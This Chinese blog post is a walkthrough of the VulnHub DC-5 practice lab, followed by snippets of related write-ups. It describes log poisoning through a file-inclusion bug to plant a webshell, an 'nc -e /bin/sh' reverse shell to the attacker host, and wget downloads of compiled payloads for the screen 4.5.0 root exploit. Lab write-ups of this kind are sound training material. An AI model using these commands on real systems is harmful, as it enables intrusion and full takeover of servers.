vulnhub-dc-5

最新推荐文章于 2024-01-10 22:20:09 发布
最新推荐文章于 2024-01-10 22:20:09 发布
阅读量210 收藏
点赞数 1
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/106738416
版权

vulnhub-dc-5

vulnhub第六个靶机

靶机地址: https://www.vulnhub.com/entry/dc-5,314/.

知识点

nmap

用nmap查询局域网内存活的主机,发现靶机ip

nmap -T4 192.168.40.0/24

在这里插入图片描述

用nmap进行更详细的探测,发现开着的端口和服务

端口服务
80http
111rpcbind
49800rpcbind

在这里插入图片描述

LFI包含日志文件写马

端口:80——>web漏洞——>成功

访问主页发现都是一些文章,只找到一个可以写东西的页面,应该是突破口

在这里插入图片描述
提交数据以后进入到另一个页面,并且每刷新一次页面中下的年份就变化一次,猜测可能存在LFI漏洞

在这里插入图片描述
通过fuzz测试,发现包含语句为file=

在这里插入图片描述
从前面nmap的扫描得此站点的服务器为nginx,可以在url上写一句话木马,写到访问日志。再包含nginx访问日志,从而拿shell

在这里插入图片描述
这里要注意别直接在浏览器url上写马,木马会被进行url加密,从而使蚁剑连不上木马。可以用burp抓包再修改,再包含日志文件,用蚁剑连接
在这里插入图片描述
在这里插入图片描述

screen 4.5.0提权

用蚁剑进行nc反弹shell

nc -e /bin/sh 192.168.40.129 4444

在这里插入图片描述

python -c "import pty;pty.spawn('/bin/bash')"  #打开一个标准shell
cat /etc/passwd

发现一个用户:dc

在这里插入图片描述
粗略的查看了没有sudo命令,邮件、备份文件、定时任务也没有,22端口是关闭的不能爆破。
最后在suid中找到了一个存在漏洞的工具screen

find / -type f -perm -u=s 2>/dev/null

在这里插入图片描述在这里插入图片描述
在kali中寻找该漏洞的poc

 searchsploit screen 4.5.0

在这里插入图片描述
将poc复制到桌面,开启http服务

cp  /usr/share/exploitdb/exploits/linux/local/41154.sh /root/

在这里插入图片描述
在这里插入图片描述
按提示生成.c文件并编译

在这里插入图片描述在这里插入图片描述

在kali上开启http服务

python -m SimpleHTTPServer

在这里插入图片描述
靶机上下载

wget http://192.168.40.129:8000/libhax.so
wget http://192.168.40.129:8000/rootshell

在这里插入图片描述
执行脚本后面的命令

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...

在这里插入图片描述
在这里插入图片描述
再回到/tmp上执行脚本,拿到root权限

在这里插入图片描述
thisistheflag.txtthisistheflag.txtthisistheflag.txtthisistheflag.txt

ps:

个人站点博客:XingHe,欢迎来踩~

XingHe_0
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHubDC-5
weixin_39219503的博客
02-01 680
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-5,314/ 题目信息如下,只有一个flag Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
Vulnhub-DC-5
T1me
10-28 121
入门系列第三弹DC-5 基本信息 下载地址:DC-5 靶机:VMware,NAT 靶机地址:192.168.172.136 攻击机:kali2 Flag:1个 渗透过程 0x01 初步信息搜集 nmap查看开放端口。发现80和111开放。 nmap -sV -p- 192.168.172.136 在详细扫描一下111,看看rpcbind的信息。 nmap -p 111 --script=rpcinfo 192.168.172.136 首先通过msf扫描一下,看看是否存在可利用漏洞,发现没有。 那看来
vulnhub dc5
qq_44925740的博客
12-09 1244
vulnhub DC5前言一、信息收集二、漏洞利用三、 提权 前言 前几个DC感觉没什么新奇(DC2有个绕过rbash,git提权),就放了个5。 一、信息收集 nmap -sn 192.168.1.0/24 nmap -Pn 192.168.1.178 然后我脑瘫的疯狂怼111端口。。。转换思路到80端口 访问web页面 扫后台 footer.php 刷新一次跟上次不一样?? 在http://192.168.1.178/contact.php提交表单包含了footer.php而且刷新的时候footer
vulnhubdc5
qq_54030686的博客
06-13 329
这个靶场延续了dc系列一贯直白的套路,直接提升权限,实际操作中还是存在着一些未能解决的问题,话不多说,直接干 官方wp地址 主机发现 这里介绍一下 ip地址之后的24,代表24个字节,A段,B段,C段各占8个字节,也就是每一个段共有256个数字,检测B段的话,0/16,检测A段的0/8 目标为139,本机IP为128,进行端口检测 不知道为什么,我这边多个了45530端口,有可能是因为我做完的缘故,但是不影响,共有三个端口80为http服务,111为rpcbind服务,45530不晓得是哪个服务 谷歌大法中
vulnhub--DC5
weixin_55129870的博客
05-19 325
kali ip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC-5 IP:192.168.44.145 端口探测 nmap -A -p1-65535 -T4 192.168.44.145 发现有一个80端口和111端口并且运行着rpcinfo服务,44040 访问http服务 发现留言板 提交XSS没有反应,但是提交时,底部时间会刷新变化 dirsearch 扫描 dirsearch是一个基于pyth...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub DC:5
spider的博客
12-06 213
靶机192.168.1.226 nmap起手。 nmap -sT -sV -o ./sC 192.168.1.226 -p -
Vulnhub DC-5
Pai_Space
02-20 287
Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with.
Vulnhub靶机 DC-5
菜浪马废的博客
03-30 273
先找到靶机 然后扫一下 nmap -sP 192.168.0.0/24 nmap -sV 192.168.0.149 发现底下的年份一直再变,怀疑文件包含漏洞 写个phpinfo试一下 返回phpinfo页面 成功 <?php phpinfo();?> 监听端口 nc建立连接 nc -nlvp 4444 /thankyou.php?file=/var/log/ngi...
vulnhubDC5
底层社会中的弱智
01-20 535
在前面的总结,遇见多参数的传值,可以尝试wfuzz来查看是否存在隐藏参数或者检测LFI漏洞 找到目标机器的IP为192.168.1.110 使用nmap来扫描一下开放的端口以及服务 80端口http服务(敏感目录爆破,十大常规漏洞的检测,中间件解析漏洞) 111端口rpc服务 NFS网络文件共享(showmount -a ip来查看具体的文件) 我先使用showmount命令来查看一下...
Vulnhub靶机之DC-5
m0_52328368的博客
08-27 477
vulnhub靶场系列之dc-5靶场详细步骤
Vulnhub靶机:DC-5
Innocence_0的博客
09-11 191
下载环境导入靶机,在kali里面扫描靶机ip地址靶机IP:192.168.190.133扫描端口:开放了两个tcp端口,我们访问一下ip在下载靶机的时候说明了只有一个flag,我们在页面试试,发现contact页面评论后会出现thankyou.php而且每次刷新下方的显示不同,扫描一下后台访问footer.php同样是每次刷新后内容不同,那猜测下方的年份显示可能是调用文件后返回的数值,尝试一下文件包含,发现成功文件包含。
vulnhub靶场之DC-5
qq_58091216的博客
01-10 1135
发现存在index.php,solutions.php,about-us.php,faq.php,contact.php,thankyou.php,footer.php七个页面。打开这几个页面,发现发开footer.php时,不断刷新,图标也在不断地变化,确认文件包含页面是footer.php。使用BurpSuite抓包,爆破后台页面,由于是php站,我们选择php字典。选择草叉模式进行爆破,选择两个爆破点,一个是文件包含变量名,一个是包含值。琢磨琢磨,最后发现,只要一刷新页面,就会变,猜想存在文件包含。
vulnhub靶场,DC-5
kukudeshuo的博客
07-13 581
vulnhub靶场,DC-5 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-5(192.168.58.148) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.148 使用nmap扫描查看目标靶机端口开放情况 开放端口:80、111、55980 web容器:nginx 浏览器访问目标靶机80端口 就只是一些文字,没
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值